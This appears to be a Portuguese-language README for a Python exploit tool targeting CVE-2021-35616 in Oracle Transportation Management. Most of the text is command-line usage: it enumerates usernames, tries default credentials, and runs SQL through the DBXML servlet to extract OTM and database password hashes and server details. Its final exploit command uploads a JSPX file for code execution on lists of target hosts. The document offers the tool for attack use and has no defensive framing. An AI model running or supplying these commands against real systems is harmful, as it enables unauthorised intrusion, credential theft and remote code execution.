
Ferramenta Python para explorar CVE-2021-35616
Ferramenta Python para explorar CVE-2021-35616
O script funciona em módulos, implementados na seguinte ordem:
► Enumeração de nomes de utilizador
► Pesquisa por credenciais padrão
► Executar uma consulta SQL utilizando o servlet DBXML
► Exploração completa e execução JSP
A sintaxe do script é a seguinte:
.\OracleOTM.py {módulo} {ficheiro TXT de hosts} {parâmetros adicionais}
Enumeração de nomes de utilizador: .\OracleOTM.py enum {ficheiro TXT de hosts} -u users.txt
Pesquisa por credenciais padrão: .\OracleOTM.py default {ficheiro TXT de hosts}
Executar uma consulta SQL utilizando o servlet DBXML: .\OracleOTM.py query {ficheiro TXT de hosts} -uq EBS.ADMIN -pq Aa123123 -q "select 1 from dual"
Também preparei algumas consultas predefinidas que considerei úteis; pode aceder diretamente a elas da seguinte forma:
.\OracleOTM.py query {ficheiro TXT de hosts} -uq EBS.ADMIN -pq Aa123123 -q os
OS – Extrair o SO do servidor
Osuser – Extrair o utilizador do SO que está a executar a BD
Hostname – Nome do host do servidor da BD
Hostip – Endereço IP do servidor da BD
Passwords – Extrair os utilizadores do OTM e as suas palavras-passe com hash
Oraversion – Versão da BD
Dbusershash – Hashes das palavras-passe dos utilizadores da BD
Dbfileslocation – Localização dos ficheiros da BD no SO
Exploração completa e execução JSP: .\OracleOTM.py exploit {ficheiro TXT de hosts} -lu EBS.ADMIN -lp Aa123123 -pf "C:\Users\user\Desktop\Header_notepad.jspx"